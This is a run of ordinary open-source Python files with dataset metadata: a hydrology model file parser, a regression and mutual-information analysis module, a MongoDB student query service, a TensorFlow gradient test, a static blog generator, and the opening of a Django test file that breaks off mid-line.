'INLET_DISCH_COEFF',\n 'REV_FLOW_DISCH_COEFF',\n 'SLOPE',\n 'LENGTH',\n 'ROUGH_COEFF',\n 'DIAMETER',\n 'WIDTH',\n 'HEIGHT')\n\n WEIRS = ('WEIR', 'SAG_WEIR')\n\n CULVERTS = ('ROUND_CULVERT', 'RECT_CULVERT')\n\n CURVES = ('RATING_CURVE', 'SCHEDULED_RELEASE', 'RULE_CURVE')\n\n result = {'type': 'STRUCTURE',\n 'header': {'link': None,\n 'numstructs': None},\n 'structures':[]}\n\n chunks = pt.chunk(KEYWORDS, lines)\n\n # Parse chunks associated with each key\n for key, chunkList in iteritems(chunks):\n # Parse each chunk in the chunk list\n for chunk in chunkList:\n # Cases\n if key == 'STRUCTTYPE':\n # Structure handler\n structType = chunk[0].strip().split()[1]\n\n # Cases\n if structType in WEIRS:\n\n weirResult = {'structtype': None,\n 'crest_length': None,\n 'crest_low_elev': None,\n 'discharge_coeff_forward': None,\n 'discharge_coeff_reverse': None,\n 'crest_low_loc': None,\n 'steep_slope': None,\n 'shallow_slope': None}\n\n # Weir type structures handler\n result['structures'].append(structureChunk(WEIR_KEYWORDS, weirResult, chunk))\n\n elif structType in CULVERTS:\n\n culvertResult = {'structtype': None,\n 'upinvert': None,\n 'downinvert': None,\n 'inlet_disch_coeff': None,\n 'rev_flow_disch_coeff': None,\n 'slope': None,\n 'length': None,\n 'rough_coeff': None,\n 'diameter': None,\n 'width': None,\n 'height': None}\n\n # Culvert type structures handler\n result['structures'].append(structureChunk(CULVERT_KEYWORDS, culvertResult, chunk))\n\n elif structType in CURVES:\n # Curve type handler\n pass\n elif key != 'STRUCTURE':\n # All other variables header\n result['header'][key.lower()] = chunk[0].strip().split()[1]\n\n return result\n\ndef xSectionLink(lines):\n \"\"\"\n Parse Cross Section Links Method\n \"\"\"\n # Constants\n KEYWORDS = ('LINK',\n 'DX',\n 'TRAPEZOID',\n 'TRAPEZOID_ERODE',\n 'TRAPEZOID_SUBSURFACE',\n 'ERODE_TRAPEZOID',\n 'ERODE_SUBSURFACE',\n 'SUBSURFACE_TRAPEZOID',\n 'SUBSURFACE_ERODE',\n 'TRAPEZOID_ERODE_SUBSURFACE',\n 'TRAPEZOID_SUBSURFACE_ERODE',\n 'ERODE_TRAPEZOID_SUBSURFACE',\n 'ERODE_SUBSURFACE_TRAPEZOID',\n 'SUBSURFACE_TRAPEZOID_ERODE',\n 'SUBSURFACE_ERODE_TRAPEZOID',\n 'BREAKPOINT',\n 'BREAKPOINT_ERODE',\n 'BREAKPOINT_SUBSURFACE',\n 'ERODE_BREAKPOINT',\n 'ERODE_SUBSURFACE',\n 'SUBSURFACE_BREAKPOINT',\n 'SUBSURFACE_ERODE',\n 'BREAKPOINT_ERODE_SUBSURFACE',\n 'BREAKPOINT_SUBSURFACE_ERODE',\n 'ERODE_BREAKPOINT_SUBSURFACE',\n 'ERODE_SUBSURFACE_BREAKPOINT',\n 'SUBSURFACE_BREAKPOINT_ERODE',\n 'SUBSURFACE_ERODE_BREAKPOINT',\n 'TRAP',\n 'TRAP_ERODE',\n 'TRAP_SUBSURFACE',\n 'ERODE_TRAP',\n 'ERODE_SUBSURFACE',\n 'SUBSURFACE_TRAP',\n 'SUBSURFACE_ERODE',\n 'TRAP_ERODE_SUBSURFACE',\n 'TRAP_SUBSURFACE_ERODE',\n 'ERODE_TRAP_SUBSURFACE',\n 'ERODE_SUBSURFACE_TRAP',\n 'SUBSURFACE_TRAP_ERODE',\n 'SUBSURFACE_ERODE_TRAP',\n 'NODES',\n 'NODE',\n 'XSEC')\n\n\n\n ERODE = ('TRAPEZOID_ERODE',\n 'TRAP_ERODE',\n 'TRAP_SUBSURFACE_ERODE',\n 'TRAP_ERODE_SUBSURFACE',\n 'BREAKPOINT_ERODE',\n 'TRAPEZOID_SUBSURFACE_ERODE',\n 'TRAPEZOID_ERODE_SUBSURFACE',\n 'BREAKPOINT_SUBSURFACE_ERODE',\n 'BREAKPOINT_ERODE_SUBSURFACE')\n\n SUBSURFACE = ('TRAPEZOID_SUBSURFACE',\n 'TRAP_SUBSURFACE',\n 'TRAP_SUBSURFACE_ERODE',\n 'TRAP_ERODE_SUBSURFACE',\n 'BREAKPOINT_SUBSURFACE',\n 'TRAPEZOID_SUBSURFACE_ERODE',\n 'TRAPEZOID_ERODE_SUBSURFACE',\n 'BREAKPOINT_SUBSURFACE_ERODE',\n 'BREAKPOINT_ERODE_SUBSURFACE')\n\n result = {'type': 'XSEC',\n 'header': {'link': None,\n 'dx': None,\n 'xSecType': None,\n 'nodes': None,\n 'erode': False,\n 'subsurface': False},\n 'xSection': None,\n 'nodes': []}\n\n chunks = pt.chunk(KEYWORDS, lines)\n\n # Parse chunks associated with each key\n for key, chunkList in iteritems(chunks):\n # Parse each chunk in the chunk list\n for chunk in chunkList:\n # Cases\n if key == 'NODE':\n # Extract node x and y\n result['nodes'].append(nodeChunk(chunk))\n\n elif key == 'XSEC':\n # Extract cross section information\n result['xSection'] = xSectionChunk(chunk)\n\n elif ('TRAPEZOID' in key) or ('BREAKPOINT' in key) or ('TRAP' in key):\n # Cross section type handler\n result['header']['xSecType'] = key\n\n elif key in ERODE:\n # Erode handler\n result['header']['erode'] = True\n\n elif key in SUBSURFACE:\n # Subsurface handler\n result['header']['subsurface'] = True\n\n else:\n # Extract all other variables into header\n result['header'][key.lower()] = chunk[0].strip().split()[1]\n\n return result\n\ndef reservoirLink(lines):\n \"\"\"\n Parse RESERVOIR Link Method\n \"\"\"\n # Constants\n KEYWORDS = ('LINK',\n 'RESERVOIR',\n 'RES_MINWSE',\n 'RES_INITWSE',\n 'RES_MAXWSE',\n 'RES_NUMPTS',\n 'LAKE',\n 'MINWSE',\n 'INITWSE',\n 'MAXWSE',\n 'NUMPTS')\n\n result = {'header': {'link': None,\n 'res_minwse': None,\n 'res_initwse': None,\n 'res_maxwse': None,\n 'res_numpts': None,\n 'minwse': None,\n 'initwse': None,\n 'maxwse': None,\n 'numpts': None},\n 'type': None,\n 'points': []}\n\n pair = {'i': None,\n 'j': None}\n\n # Rechunk the chunk\n chunks = pt.chunk(KEYWORDS, lines)\n\n # Parse chunks associated with each key\n for key, chunkList in iteritems(chunks):\n # Parse each chunk in the chunk list\n for chunk in chunkList:\n schunk = chunk[0].strip().split()\n\n\n # Cases\n if key in ('NUMPTS', 'RES_NUMPTS'):\n # Points handler\n result['header'][key.lower()] = schunk[1]\n\n # Parse points\n for idx in range(1, len(chunk)):\n schunk = chunk[idx].strip().split()\n\n for count, ordinate in enumerate(schunk):\n # Divide ordinates into ij pairs\n if (count % 2) == 0:\n pair['i'] = ordinate\n else:\n pair['j'] = ordinate\n result['points'].append(pair)\n pair = {'i': None,\n 'j': None}\n\n elif key in ('LAKE', 'RESERVOIR'):\n # Type handler\n result['type'] = schunk[0]\n else:\n # Header variables handler\n result['header'][key.lower()] = schunk[1]\n return result\n\ndef nodeChunk(lines):\n \"\"\"\n Parse NODE Method\n \"\"\"\n # Constants\n KEYWORDS = ('NODE',\n 'X_Y',\n 'ELEV')\n\n result = {'node': None,\n 'x': None,\n 'y': None,\n 'elev': None}\n\n chunks = pt.chunk(KEYWORDS, lines)\n\n # Parse chunks associated with each key\n for key, chunkList in iteritems(chunks):\n # Parse each chunk in the chunk list\n for chunk in chunkList:\n schunk = chunk[0].strip().split()\n if key == 'X_Y':\n result['x'] = schunk[1]\n result['y'] = schunk[2]\n else:\n result[key.lower()] = schunk[1]\n\n return result\n\ndef xSectionChunk(lines):\n \"\"\"\n Parse XSEC Method\n \"\"\"\n # Constants\n KEYWORDS = ('MANNINGS_N',\n 'BOTTOM_WIDTH',\n 'BANKFULL_DEPTH',\n 'SIDE_SLOPE',\n 'NPAIRS',\n 'NUM_INTERP',\n 'X1',\n 'ERODE',\n 'MAX_EROSION',\n 'SUBSURFACE',\n 'M_RIVER',\n 'K_RIVER')\n\n result = {'mannings_n': None,\n 'bottom_width': None,\n 'bankfull_depth': None,\n 'side_slope': None,\n 'npairs': None,\n 'num_interp': None,\n 'erode': False,\n 'subsurface': False,\n 'max_erosion': None,\n 'm_river': None,\n 'k_river': None,\n 'breakpoints': []}\n\n chunks = pt.chunk(KEYWORDS, lines)\n\n # Parse chunks associated with each key\n for key, chunkList in iteritems(chunks):\n # Parse each chunk in the chunk list\n for chunk in chunkList:\n # Strip and split the line (only one item in each list)\n schunk = chunk[0].strip().split()\n\n # Cases\n if key == 'X1':\n # Extract breakpoint XY pairs\n x = schunk[1]\n y = schunk[2]\n result['breakpoints'].append({'x': x, 'y': y})\n\n if key in ('SUBSURFACE', 'ERODE'):\n # Set booleans\n result[key.lower()] = True\n\n else:\n # Extract value\n result[key.lower()] = schunk[1]\n return result\n\ndef structureChunk(keywords, resultDict, lines):\n \"\"\"\n Parse Weir and Culvert Structures Method\n \"\"\"\n chunks = pt.chunk(keywords, lines)\n\n # Parse chunks associated with each key\n for key, chunkList in iteritems(chunks):\n # Parse each chunk in the chunk list\n for chunk in chunkList:\n # Strip and split the line (only one item in each list)\n schunk = chunk[0].strip().split()\n\n # Extract values and assign to appropriate key in resultDict\n resultDict[key.lower()] = schunk[1]\n\n return resultDict\n","repo_name":"CI-WATER/gsshapy","sub_path":"gsshapy/lib/cif_chunk.py","file_name":"cif_chunk.py","file_ext":"py","file_size_in_byte":13650,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"4132628986","text":"from .helper import *\nfrom .opticflow import VelField\nfrom sklearn.feature_selection import mutual_info_regression\n\n\ndef mi_analysis(\n\t\tz: np.ndarray,\n\t\tg: np.ndarray,\n\t\tn_bins: int = 20,\n\t\tparallel: bool = True,\n\t\tbackend: str = 'loky',\n\t\tn_jobs: int = -1,):\n\t# mi regression\n\tif parallel:\n\t\twith joblib.parallel_backend(backend):\n\t\t\tmi = joblib.Parallel(n_jobs=n_jobs)(\n\t\t\t\tjoblib.delayed(mutual_info_regression)\n\t\t\t\t(g, z[:, i]) for i in range(z.shape[-1])\n\t\t\t)\n\t\tmi = np.stack(mi).T\n\telse:\n\t\tmi = np.zeros((g.shape[-1], z.shape[-1]))\n\t\tfor i in range(len(mi)):\n\t\t\tmi[i] = mutual_info_regression(z, g[:, i])\n\t# mi normalized (discrete)\n\tmi_normalized = discrete_mutual_info(\n\t\tz=z,\n\t\tg=g,\n\t\taxis=1,\n\t\tn_bins=n_bins,\n\t\tparallel=parallel,\n\t\tn_jobs=n_jobs,\n\t)\n\toutput = {\n\t\t'mi': mi,\n\t\t'mi_norm': mi_normalized,\n\t\t'mig': compute_mig(mi_normalized),\n\t}\n\treturn output\n\n\ndef regress(\n\t\tz: np.ndarray,\n\t\tg: np.ndarray,\n\t\tz_tst: np.ndarray,\n\t\tg_tst: np.ndarray,\n\t\tprocess: bool = True, ):\n\tif process:\n\t\tmu, sd = z.mean(), z.std()\n\t\tz = (z - mu) / sd\n\t\tz_tst = (z_tst - mu) / sd\n\t# linear regression\n\tlr = sk_linear.LinearRegression().fit(z, g)\n\tg_pred = lr.predict(z_tst)\n\t# performance\n\tr = 1 - sp_dist.cdist(\n\t\tXA=g_tst.T,\n\t\tXB=g_pred.T,\n\t\tmetric='correlation',\n\t)\n\tr2 = sk_metric.r2_score(\n\t\ty_true=g_tst,\n\t\ty_pred=g_pred,\n\t\tmultioutput='raw_values',\n\t)\n\tr2[r2 <= 0] = np.nan\n\t# DCI\n\tw = np.abs(lr.coef_)\n\tw *= z.std(0).reshape(1, -1)\n\tw /= g.std(0).reshape(-1, 1)\n\td, c = compute_dci(w)\n\toutput = {\n\t\t'r': r,\n\t\t'r2': r2,\n\t\t'd': d,\n\t\t'c': c,\n\t}\n\treturn output\n\n\ndef compute_mig(mi_normalized: np.ndarray, axis: int = 0):\n\tassert mi_normalized.ndim == 2\n\tn_factors = mi_normalized.shape[axis]\n\tmig = np.zeros(n_factors)\n\tfor i in range(n_factors):\n\t\ta = mi_normalized.take(i, axis)\n\t\tinds = np.argsort(a)[::-1]\n\t\tmig[i] = a[inds[0]] - a[inds[1]]\n\treturn mig\n\n\ndef compute_dci(w: np.array):\n\t# p_disentang\n\tdenum = w.sum(0, keepdims=True)\n\tdenum[denum == 0] = np.nan\n\tp_disentang = w / denum\n\t# p_complete\n\tdenum = w.sum(1, keepdims=True)\n\tdenum[denum == 0] = np.nan\n\tp_complete = w / denum\n\t# compute D and C\n\td_i = 1 - entropy_normalized(p_disentang, 0)\n\tc_mu = 1 - entropy_normalized(p_complete, 1)\n\trho = w.sum(0) / w.sum()\n\td = np.nansum(d_i * rho)\n\tc = np.nanmean(c_mu)\n\treturn d, c\n\n\nclass LinearModel(object):\n\tdef __init__(\n\t\t\tself,\n\t\t\tcategory: str,\n\t\t\tx: np.ndarray,\n\t\t\ty: np.ndarray,\n\t\t\tx_tst: np.ndarray = None,\n\t\t\ty_tst: np.ndarray = None,\n\t\t\talphas: Iterable[float] = None,\n\t\t\tn_folds: int = 5,\n\t\t\tseed: int = 0,\n\t\t\tverbose: bool = False,\n\t):\n\t\tsuper(LinearModel, self).__init__()\n\t\tself.fn = getattr(sk_linear, category)\n\t\tself.defaults = get_default_params(self.fn)\n\t\tif 'random_state' in self.defaults:\n\t\t\tself.defaults['random_state'] = seed\n\t\tself.category = category\n\t\tself.kwargs = None\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.x_tst = x_tst\n\t\tself.y_tst = y_tst\n\t\tif alphas is None:\n\t\t\talphas = [0.1, 1, 10, 100]\n\t\tassert isinstance(alphas, Collection)\n\t\tif category == 'LinearRegression':\n\t\t\talphas = [0]\n\t\tself.alphas = alphas\n\t\tself.kf = sk_modselect.KFold(\n\t\t\tn_splits=n_folds,\n\t\t\trandom_state=seed,\n\t\t\tshuffle=True,\n\t\t)\n\t\tself.models = {}\n\t\tself.kers = {}\n\t\tself.preds = {}\n\t\tself._init_df()\n\n\t\tif verbose:\n\t\t\tmsg = f\"Category: '{self.category}', \"\n\t\t\tmsg += f\"default params:\\n{self.defaults}\"\n\t\t\tprint(msg)\n\n\tdef best_alpha(self):\n\t\tassert self.kwargs is not None\n\t\tif self.category in ['Ridge', 'LinearRegression']:\n\t\t\tbest_a, perf = max(\n\t\t\t\tself.df['r'].items(),\n\t\t\t\tkey=lambda t: t[1],\n\t\t\t)\n\t\telif self.category == 'PoissonRegressor':\n\t\t\tbest_a, perf = max(\n\t\t\t\tself.df['nnll'].items(),\n\t\t\t\tkey=lambda t: t[1],\n\t\t\t)\n\t\telse:\n\t\t\traise NotImplementedError(self.category)\n\t\tif best_a not in self.models:\n\t\t\t_ = self._fit(best_a)\n\t\treturn best_a, perf\n\n\tdef fit_linear(self, **kwargs):\n\t\tself.kwargs = setup_kwargs(self.defaults, kwargs)\n\t\tself.kwargs = filter_kwargs(self.fn, self.kwargs)\n\t\tself._fit_xv()\n\t\treturn self\n\n\tdef _fit_xv(self):\n\t\tfor a in self.alphas:\n\t\t\tnnll, r = [], []\n\t\t\tif 'alpha' in self.kwargs:\n\t\t\t\tself.kwargs['alpha'] = a\n\t\t\tfor f, (trn, vld) in enumerate(self.kf.split(self.x)):\n\t\t\t\tmodel = self.fn(**self.kwargs)\n\t\t\t\tmodel.fit(flatten_stim(self.x[trn]), self.y[trn])\n\t\t\t\tpred = model.predict(flatten_stim(self.x[vld]))\n\t\t\t\tnnll.append(null_adj_ll(self.y[vld], np.maximum(0, pred)))\n\t\t\t\tr.append(sp_stats.pearsonr(self.y[vld], pred)[0])\n\t\t\tself.df.loc[a, 'nnll'] = np.nanmean(nnll)\n\t\t\tself.df.loc[a, 'r'] = np.nanmean(r)\n\t\treturn\n\n\tdef _fit(self, a: float):\n\t\tif 'alpha' in self.kwargs:\n\t\t\tself.kwargs['alpha'] = a\n\t\tmodel = self.fn(**self.kwargs)\n\t\tmodel.fit(flatten_stim(self.x), self.y)\n\t\tkernel = model.coef_.reshape(self.x.shape[1:])\n\t\ttry:\n\t\t\tself.kers[a] = VelField(kernel)\n\t\texcept AssertionError:\n\t\t\tself.kers[a] = kernel\n\t\tself.models[a] = model\n\t\t# test\n\t\tif self.x_tst is not None:\n\t\t\tpred = model.predict(flatten_stim(self.x_tst))\n\t\t\tr = sp_stats.pearsonr(self.y_tst, pred)[0]\n\t\t\tr2 = sk_metric.r2_score(self.y_tst, pred)\n\t\t\tself.df.loc[a, 'r2_tst'] = r2\n\t\t\tself.df.loc[a, 'r_tst'] = r\n\t\t\tself.preds[a] = pred\n\t\treturn model\n\n\tdef _init_df(self):\n\t\tfill_vals = [np.nan] * len(self.alphas)\n\t\tdf = {\n\t\t\t'alpha': self.alphas,\n\t\t\t'r': fill_vals,\n\t\t\t'nnll': fill_vals,\n\t\t}\n\t\tif self.x_tst is not None:\n\t\t\tdf.update({\n\t\t\t\t'r_tst': fill_vals,\n\t\t\t\t'r2_tst': fill_vals,\n\t\t\t})\n\t\tself.df = pd.DataFrame(df).set_index('alpha')\n\t\treturn\n\n\tdef show_pred(self, figsize=(6.0, 3.0)):\n\t\tif not self.preds:\n\t\t\treturn\n\t\tfig, ax = create_figure(1, 1, figsize)\n\t\tax.plot(self.y_tst, lw=1.8, color='k', label='true')\n\t\tfor i, (a, pred) in enumerate(self.preds.items()):\n\t\t\tr2 = self.df.loc[a, 'r2_tst'] * 100\n\t\t\tlbl = r\"$R^2 = $\" + f\"{r2:0.1f}% (\"\n\t\t\tlbl += r\"$\\alpha = $\" + f\"{a:0.2g})\"\n\t\t\tax.plot(pred, color=f'C{i}', label=lbl)\n\t\tax.legend(fontsize=8)\n\t\tleg = ax.get_legend()\n\t\tif leg is not None:\n\t\t\tleg.set_bbox_to_anchor((1.0, 1.03))\n\t\tax.grid()\n\t\tplt.show()\n\t\treturn fig, ax\n\n\ndef compute_sta(\n\t\tn_lags: int,\n\t\tstim: np.ndarray,\n\t\tspks: np.ndarray,\n\t\tgood: np.ndarray = None,\n\t\tzscore: bool = True,\n\t\tnanzero: bool = True,\n\t\tverbose: bool = False, ):\n\tassert n_lags >= 0\n\tshape = stim.shape\n\tnc = spks.shape[-1]\n\tsta = np.zeros((nc, n_lags+1, *shape[1:]))\n\tshape = (nc,) + (1,) * len(shape)\n\tif zscore:\n\t\tstim = sp_stats.zscore(stim)\n\tif good is None:\n\t\tinds = np.arange(len(stim))\n\telse:\n\t\tinds = good.copy()\n\tinds = inds[inds > n_lags]\n\tfor t in tqdm(inds, disable=not verbose):\n\t\t# zero n_lags allowed:\n\t\tx = stim[t - n_lags: t + 1]\n\t\tfor i in range(nc):\n\t\t\ty = spks[t, i]\n\t\t\tif y > 0:\n\t\t\t\tsta[i] += x * y\n\tn = spks[inds].sum(0)\n\tn = n.reshape(shape)\n\tsta /= n\n\tif nanzero:\n\t\tsta[np.isnan(sta)] = 0.0\n\t\tif verbose:\n\t\t\twarnings.warn(\"NaN in STA\", RuntimeWarning)\n\treturn sta\n","repo_name":"hadivafaii/_MTMST","sub_path":"analysis/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":6718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41372101451","text":"from pymongo.mongo_client import MongoClient\n\ndef get_database():\n url = 'mongodb://localhost:27017/'\n\n # Create a new client and connect to the server\n client = MongoClient(url)\n\n return client['school']\n\n\ndef get_students():\n db = get_database()\n collection = db[\"students\"]\n documents = collection.find()\n\n users = []\n\n for doc in documents:\n users.append(doc['name'])\n\n return users\n\n\ndef get_top_10_students():\n db = get_database()\n collection = db[\"students\"]\n top_students = collection.find({}, {'name': 1, 'scores': {'$slice': [0, 1]}}).sort([('scores.0', -1)]).limit(10)\n\n\n students = []\n for s in top_students:\n student = {\"name\": s[\"name\"], \"score\": s[\"scores\"][0][\"score\"]}\n students.append(student)\n\n return students\n\ndef get_top_10_students_aggregate():\n db = get_database()\n collection = db[\"students\"]\n pipeline = [\n { \"$project\": { \"name\": 1, \"examScore\": { \"$arrayElemAt\": [\"$scores.score\", 0] } } },\n { \"$sort\": { \"examScore\": -1 } },\n { \"$limit\": 10 }]\n\n result = collection.aggregate(pipeline)\n\n students = []\n for s in result:\n student = {\"name\": s[\"name\"], \"score\": s[\"examScore\"]}\n students.append(student)\n\n return students\n\ndef create_student(student):\n db = get_database()\n collection = db[\"students\"]\n\n result = collection.insert_one(student)\n\n return result\n","repo_name":"JuliusKryger/DatabaseSP3","sub_path":"server/services/db_service.py","file_name":"db_service.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73191096426","text":"import numpy as np\nimport tensorflow as tf\n\nb_size = 16\ni_size = 32\no_size = 8\n\nnp.random.seed(3)\ntf.set_random_seed(3)\n\nx = tf.placeholder(tf.float32, shape=[b_size, i_size])\n\nW_a = tf.Variable(tf.random_uniform([i_size, 1]), name='W_a')\nb_a = tf.Variable(tf.zeros([1]), name='b_a')\np_a = tf.nn.sigmoid(tf.matmul(x, W_a) + b_a)\n\nW_1 = tf.Variable(tf.random_uniform([i_size, o_size]), name='W_1')\nb_1 = tf.Variable(tf.zeros([o_size]), name='b_1')\np_1 = tf.nn.softmax(tf.matmul(x, W_1) + b_1)\n\nW_2 = tf.Variable(tf.random_uniform([i_size, o_size]), name='W_2')\nb_2 = tf.Variable(tf.zeros([o_size]), name='b_2')\np_2 = tf.nn.softmax(tf.matmul(x, W_2) + b_2)\n\n# b_y = tf.Variable(tf.zeros([o_size]), name='b_y')\n\n# y = p_a * p_1 + (1 - p_a) * p_2\n\n# act = tf.stop_gradient(tf.cast(tf.greater(p_a, tf.constant(0.5, name='0.5')), tf.float32))\nact = tf.cast(tf.greater(p_a, tf.constant(0.5, name='0.5')), tf.float32)\n\ny = (act * p_1 + (1 - act) * p_2) * p_a\n# y = (act * p_1 + (1 - act) * p_2 + b_y) * p_a\n\nt = tf.placeholder(tf.float32, shape=[b_size, o_size])\nl = tf.reduce_mean(tf.square(y - t))\n\noptimizer = tf.train.AdamOptimizer(0.1)\ngrads_and_vars = optimizer.compute_gradients(l)\ntrain_op = optimizer.apply_gradients(grads_and_vars)\n\n# mannually check each grad & var\n# grads = []\n# names = []\n\n# for g, v in tuple(grads_and_vars):\n# \tif g is not None:\n# \t\tgrads.append(g)\n# \telse:\n# \t\tgrads.append(tf.constant('None'))\n# \tnames.append(v.name)\n\n# train_op = optimizer.minimize(l)\n\ninit_op = tf.initialize_all_variables()\n\nwith tf.Session() as sess:\n\tsess.run(init_op)\n\n\tsummary_writer = tf.train.SummaryWriter('./', sess.graph)\n\tsummary_writer.flush()\n\n\tx_np = np.random.rand(b_size, i_size).astype(np.float32)\n\tt_np = np.random.rand(b_size, o_size).astype(np.float32)\n\n\tfeed_dict = {\n\t\tx : x_np,\n\t\tt : t_np\n\t}\n\n\t# print sess.run(W_a).reshape(1, -1)\n\t# grads_np = sess.run(grads, feed_dict=feed_dict)\n\t# for grad, name in zip(grads_np, names):\n\t# \tprint name, grad if isinstance(grad, str) else grad.shape\n\t# sess.run(train_op, feed_dict=feed_dict)\n\t# print sess.run(W_a).reshape(1, -1)\n\n\tgrads_np = sess.run(train_op, feed_dict=feed_dict)","repo_name":"zihangdai/tensorflow_feature_test","sub_path":"discrete_module.py","file_name":"discrete_module.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29900825095","text":"from bs4 import BeautifulSoup\nfrom collections import namedtuple\nimport datetime\nimport os\n\n\nSRC_DIR = '.'\nTEMPLATES_DIR = 'templates'\n\nARTICLE_CARD = \"\"\"\n<div class=\"card row\">\n <div class=\"col card-body\">\n <a href=\"{article_link}\" class=\"article-card link\">\n <h3 class=\"card-title\">{title}</h3>\n </a>\n <div class=\"card-text\">\n <ul class=\"taglist\">\n {tags}\n </ul>\n <div><b>Published Date:</b> <time datetime=\"{date}\">{readable_date}</time></div>\n <p>{summary}</p>\n </div>\n </div>\n</div>\n\"\"\"\n\nTAGS_PAGE = \"\"\"\n<div class=\"container mt-4\">\n <h2>Tags</h2>\n <ul class=\"alltags\">\n {tags}\n </ul>\n</div>\n\"\"\"\n\nArticle = namedtuple('Article', ['title', 'date', 'tags', 'summary', 'path'])\n\n\ndef parse_article(article_path):\n with open(article_path, 'r') as f:\n article_html = f.read()\n\n path = '/articles/{}'.format(article_path.split('/')[-1])\n\n soup = BeautifulSoup(article_html, 'html.parser')\n article_soup = soup.find('div', attrs={'class': 'article'})\n assert article_soup, \"Failed to find the article class\"\n\n title = article_soup.find('h2')\n assert(title)\n title = title.get_text()\n\n taglist = article_soup.find(attrs={'class': 'taglist'})\n tags = []\n for tag in taglist.find_all('li'):\n tags.append(tag.get_text().strip())\n\n date_str = article_soup.find('time').attrs.get('datetime', '')\n assert(date_str)\n year, month, day = map(int, date_str.split('-'))\n date = datetime.date(year, month, day)\n\n summary = article_soup.find(attrs={'class': 'summary'})\n for tag in summary.find_all(attrs={'class': 'sup-reference'}):\n tag.decompose()\n for tag in summary.find_all(attrs={'class': 'reference'}):\n tag.decompose()\n\n return Article(title, date, tags, summary, path)\n\n\ndef read_articles():\n article_names = os.listdir(f'{SRC_DIR}/articles')\n article_paths = [os.path.join(os.path.abspath('.'), f'{SRC_DIR}/articles',\n name) for name in article_names if name.endswith('.html')]\n return sorted(list(map(parse_article, article_paths)), key=lambda x: x.date)\n\n\ndef build_card(article):\n tags = BeautifulSoup('', 'html.parser')\n for i, tag in enumerate(article.tags):\n soup = BeautifulSoup(f'<li><a href=\"#\">{tag}</a></li>', 'html.parser')\n tags.insert(i, soup)\n\n card = ARTICLE_CARD.format(title=article.title, tags=tags.prettify(),\n date=article.date.strftime('%Y-%m-%d'), readable_date=article.date.strftime('%B %d, %Y'),\n summary=article.summary.prettify(), article_link=article.path)\n return BeautifulSoup(card, 'html.parser')\n\n\ndef build_cards(articles):\n built = BeautifulSoup('<div class=\"container\"></div>', 'html.parser')\n container = built.contents[0]\n\n for i, article in enumerate(articles):\n container.insert(i, build_card(article))\n\n return built\n\n\ndef write(html, title, file_path):\n with open(f'{TEMPLATES_DIR}/head.html', 'r') as f:\n head = f.read()\n\n with open(f'{TEMPLATES_DIR}/tail.html', 'r') as f:\n tail = f.read()\n\n full_html = BeautifulSoup(head + html + tail, 'html.parser')\n title_html = full_html.find('title')\n title_html.clear()\n title_html.insert(0, title)\n with open(file_path, 'w') as f:\n f.write(full_html.prettify())\n\n\ndef build_tag_page(tag, articles):\n cards = build_cards(articles)\n heading = f'Tag: {tag}'\n\n container = cards.find('div', attrs={'class': 'container'})\n tag_heading = BeautifulSoup(f'<h2 class=\"tag mt-4\">{heading}</h2>', 'html.parser')\n container.insert(0, tag_heading)\n\n write(cards.prettify(), f\"{heading} | Layog's blog\",\n f'{SRC_DIR}/tag/{tag.lower()}.html')\n\n\ndef build_tags_pages(articles):\n all_tags = {}\n for article in articles:\n for tag in article.tags:\n all_tags.setdefault(tag.lower(), ([], []))\n all_tags[tag.lower()][0].append(tag)\n all_tags[tag.lower()][1].append(article)\n\n for tag, (representations, articles) in all_tags.items():\n if len(set(representations)) > 1:\n print(\"WARNING: There are multiple representations for tag {}: {}\".format(tag, \", \".join(representations)))\n\n build_tag_page(representations[0], articles)\n\n lower_tags = list(all_tags.keys())\n lower_tags.sort(key=lambda x: (len(all_tags[x][1]), x))\n\n tags = BeautifulSoup('', 'html.parser')\n for i, tag in enumerate(lower_tags):\n rep = all_tags[tag][0][0]\n count = len(all_tags[tag][1])\n soup = BeautifulSoup(f'<li><a href=\"/tag/{tag}.html\">{rep} ({count})</a></li>', 'html.parser')\n tags.insert(i, soup)\n\n write(TAGS_PAGE.format(tags=tags.prettify()), \"Tags | Layog's blog\",\n f'{SRC_DIR}/tags.html')\n\n\ndef build_home_page(articles):\n cards = build_cards(articles)\n first_card = cards.find('div', attrs={'class': 'card'})\n first_card.attrs['class'].append('mt-4')\n write(cards.prettify(), \"Layog's blog\", f'{SRC_DIR}/index.html')\n\n\ndef update_dates_in_articles(articles):\n for article in articles:\n article_file_name = article.path.split('/')[-1]\n article_file_path = f'{SRC_DIR}/articles/{article_file_name}'\n\n with open(article_file_path, 'r') as f:\n soup = BeautifulSoup(f.read(), 'html.parser')\n\n for date_tag in soup.find_all('time'):\n date_str = date_tag.attrs.get('datetime', '')\n assert(date_str)\n year, month, day = map(int, date_str.split('-'))\n date = datetime.date(year, month, day)\n\n date_tag.clear()\n date_tag.insert(0, date.strftime('%B %d, %Y'))\n\n with open(article_file_path, 'w') as f:\n f.write(soup.prettify())\n\n\ndef main():\n articles = read_articles()\n build_home_page(articles)\n build_tags_pages(articles)\n update_dates_in_articles(articles)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"layog/layog.github.io","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":5660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36301064090","text":"from django.conf import settings\nfrom django.core.management import call_command\nfrom django.db import models\nfrom django.db.models.loading import load_app\nfrom django.test import TestCase\n\nfrom usertools.helpers import update_related_fields\nfrom usertools.tests.test_app.models import Author, Book, Chapter, Page\n\n\nclass HelpersTest(TestCase):\n # @@@ If I was really cool I'd put these in here.\n # fixtures = []\n\n def setUp(self):\n self.old_INSTALLED_APPS = settings.INSTALLED_APPS\n settings.INSTALLED_APPS = (\n 'usertools',\n 'usertools.tests.test_app',\n )\n load_app('usertools.tests.test_app')\n call_command('syncdb', verbosity=0, interactive=False)\n\n def tearDown(self):\n settings.INSTALLED_APPS = self.old_INSTALLED_APPS\n\n def 